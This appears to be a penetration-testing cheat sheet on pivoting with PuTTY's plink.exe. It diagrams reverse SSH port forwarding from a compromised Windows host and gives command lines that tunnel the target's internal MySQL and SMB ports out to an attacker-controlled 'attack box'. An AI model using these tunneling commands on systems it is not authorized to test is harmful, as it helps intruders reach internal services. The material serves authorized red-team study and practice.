Port Forwarding with PLINK
Download Plink
You can download the latest plink.exe
binary from here: https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
Individual PortĀ Forwarding
- UsingĀ
plink.exe
in SSH mode - A service on a compromised host is listening on
127.0.0.1
- Open a port on attack box and forward traffic to remote port
Reverse Local Port to Remote Port
Step 1. Estabish SSH Tunnel from Remote
[Attack Box] <<=========[SSH]========[+] [Remote]
127.0.0.1:[port] 127.0.0.1:[port]
[+] ^
|____________________________________|
Step 2. Reverse Forward Attack Box Port to Remote
# Example Commands
# ----------------
# Open 127.0.0.1:33060 on Attack Box
# Tunnel to 127.0.0.1:3306 on target
# Password authentication
echo 'y' | .\plink.exe -ssh -l username -pw password -batch -N -R 127.0.0.1:33060:127.0.0.1:3306 attack-box-ip
# Private key authentication
echo 'y' | .\plink.exe -ssh -l username -i C:\Windows\Temp\key.pem -batch -N -R 127.0.0.1:33060:127.0.0.1:3306 attack-box-ip
# Multiple port forwards
echo 'y' | .\plink.exe -ssh -l username -i C:\Windows\Temp\key.pem -batch -N -R 127.0.0.1:33060:127.0.0.1:3306 -R 127.0.0.1:4445:127.0.0.1:445 attack-box-ip